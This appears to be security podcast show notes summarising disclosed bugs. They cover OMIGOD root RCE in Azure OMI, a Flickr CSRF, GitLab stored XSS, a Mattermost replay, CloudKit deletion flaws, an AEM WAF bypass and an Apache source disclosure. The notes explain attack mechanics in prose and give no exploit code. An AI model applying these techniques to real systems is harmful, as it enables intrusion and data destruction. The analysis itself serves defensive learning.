A Flickr CSRF, GitLab, & OMIGOD, Azure again?
When SmugMug bought Flickr from Yahoo they had to move the authentication system away from Yahoo’s authentication. A side-effect of this was that the account deletion process previously had used the Yahoo authentication code as the CSRF token so in the move the token was removed and not replaced with anything functionally equivalent.
I’d imagine this is because the developer would have seen the Yahoo Auth Token as well the Yahoo Auth Token to associate with Yahoo, and not as serving double purpose to prevent CSRF. Its a good reminder to not try and be clever with reusing pieces of information, because later development can pretty easily make mistakes like this.
There are four vulnerabilities in Azure’s Open Management Infrastructure (OMI), one allowing an unauthenticated attacker on the internet to execute code as root, the other three allowing local users of any level to execute code as root.
Unauthenticated Root RCE
This one does require that the OMI management port be exposed which mitigates the risk as for most but not all services with OMI. It is exposed by default on the Configuration Manager and System Center Operation Manager. And as far as vulnerabilities go, by simply not providing the
Authorization header the authorization code is never run resulting in the
gid never being initalized to non-zero values. Zero being the uid/gid of the
root user on most Linux systems.
Local Privileges Escalation (CVE-2021-38648)
Somewhat similar to the prior issue, however taking place in the
omicli application which is used to communicate with the
omiengine (which processes when necessary, and passes along requests to the
omiserver running as root). By capturing a legitimate command execution request from
omicli and removing the authentication part
omiengine will pass along the
omiserver with zeroed values, which
omiserver has no choice but to trust.
Local Privileges Escalation (CVE-2021-38645)
Unlike the prior two this one is actually a bit of a race condition and improperly trusting incoming messages from the users as server messages. First the authentication process is that
omicli sends credentials to
omiengine sends them to
omiserver to be validated.
omiserver sends a response back.
An attacker can attempt to race that response, by sending a success message to
omiserver replies. This does require knowing the connection number for the
omicli connection as it is included in the response from
omiserver however according to the author this is usually a number less than 10, and I imagine it is an incremental number so it should be fairly predictable, and you can try multiple times.
A WAF bypass by confusing the Adobe Experience Manager Dispatcher (load balancer/waf/etc). Not a crazy idea but I don’t think we’ve covered any WAF bypass quite like this on the podcast before. The goal was to access
/bin/querybuilder.json (I’m not sure if the
.json was part of the endpoint or part of the confusing the Dispatcher) which would lead to access to the host filesystem. This was done by fuzzing the endpoint with various allowed features and parameters until the Dispatcher send the query through. Resuling in a final path along the lines of
For a GitLab bug, this one is nice and simple, stored XSS in the “default branch name” field. For a group you can setup what the group’s default branch name should be for any new repositories created. Then when creating a new repository GitLab provides code to be executed that will initalize your repository, this code will reflect the default branch name without any sanitization to whoever is viewing the page.
Its a bit surprising this XSS wasn’t discovered sooner because it is rather straight forward, though in fairness I do believe this feature is relatively new (maybe a year?) and it is a bit of an unseen location.
This is effectively a replay attack. Join a channel you can comment in, place a comment and capture that POST request. Switch to a channel you cannot comment in (but can join) and send that captured POST request. Its interesting that permissions were (apparently) not being checked at the time of sending on the server, also that since no modification of that captured request was necessary Mattermost must be tracking state like which channel is being viewed on the server side rather than including it with the request which makes me suspicious that there would be other state-tracking issues in the application for future bug hunters to find.
Three bugs relating to insecurely configured CloudKit containers, the big one being the accidental deletion of all Apple Shortcuts, but also the ability to delete records on Apple News, and modify data used on the iCrowd+ website.
CloudKit Primer - For the uninitiated, CloudKit is a data storage framework from apple to take an apps data and store it in the cloud. Application developers can create a container, containers have environments with three scopes (Private, Shared, and Public). Public being accessible by anyone with a public API token. Each scope has zones, the default zone being
_defaultZone and finally, each zone has Records with Fields which have types and where the data is actually stored.
The author also found that there are atleast three different APIs that communicate with CloudKit in different ways. This becomes important as he switches between the API the application uses and one that is easier to communicate with at points.
Apple News - Took a bit more effort to figure things out here because Apple News used the Protobuf API, ultimately using the API that Apple Notes uses (and changing the container) he was able to see that all News articles and stock information were in the public scope. While most of the methods were not allowed one method
forceDelete was, granting the ability to delete any News article or Stock.
Apple Shortcuts - This one caused some drama as the testing became destructive deleting all shared Apple Shortcuts. Essentially shared shortcuts would be moved into the Public envrionment in the
_defaultZone. The problem was that a public user could delete the
A rather non-intuitive bug where sending
Content-Length: x would result in source disclosure on Apache.
The root of the bug is rather non-intuitive and has its origins in ignoring errors from filters. Naturally one of the HTTP Filters does see the invalid
Content-Length header and makes a call to
bail_out_on_error to write out the error message and bail. Rather than properly bailing however, the function that triggers the filter chain gets the
AP_FILTER_ERROR return code and has a switch statement on it. Which just happens to completely ignore the
AP_FILTER_ERROR case allowing the bad request to continue being processed.
Ultimately invoking a “txt/HTML” generator on the PHP file resulting in the PHP’s source code being written as output rather than executing the PHP interpreter. Its not entirely clear from the write-up why “txt/HTML” but my educated guess would be that a later filter in the chain that would normally change the generator and type simply wasn’t executed due to the early error return.
While this bug was silently patched, the security implications were not recognized and so the vulnerability has not (at the time of the presentation) been back ported.